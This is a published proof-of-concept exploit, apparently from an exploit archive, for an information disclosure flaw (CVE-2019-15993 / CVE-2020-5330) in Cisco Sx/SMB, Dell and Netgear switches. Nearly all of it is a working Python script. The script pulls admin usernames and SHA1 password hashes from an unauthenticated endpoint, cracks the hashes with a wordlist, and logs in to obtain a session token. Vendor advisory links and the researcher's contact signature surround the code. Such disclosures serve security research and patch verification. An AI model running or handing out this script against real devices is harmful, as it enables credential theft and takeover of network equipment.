Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure

# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and  Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos


# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle


# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle


import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()

def userName_parser(text, start_delimiter, end_delimiter):
    results = []
    iteration = 0
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)

                iteration = iteration + 1
    return results

# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the values from the file
with open(file, 'r') as f:
    values = f.readlines()

values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    url = response.headers["Location"] + "config/device/adminusersetting"
    response=requests.get(url, verify=False)

    if response.status_code == 200:
        print("[*] Successful request to URL:", url + "\n")
        content = response.text
        users_names = userName_parser(content,"<userName>","</userName>")
        sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)

        print("SHA1 Hashes found:\n")

        loops = 0
        while loops < len(sha1_hashes):
            print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")


            for sha1_hash in sha1_hashes:
                if sha1_hash in hashes:
                     print("Match:", sha1_hash, hashes[sha1_hash])
                     print("\nTesting Credentials via API.\n\n")
                     payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])

                     response_login = requests.get(payload, allow_redirects=False, verify=False)
                     headers = response_login.headers
                     if "sessionID" in headers:
                          print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                          print(headers["sessionID"])
                     else:
                          print("Unable to sign in.")
            loops = loops + 1
    else:
        print("Host is not vulnerable:", response.status_code)






[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
    Ken Pyle
    M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
    Main: 267-540-3337
    Direct: 484-498-8340
    Email: [email protected]
    Website: www.cybir.com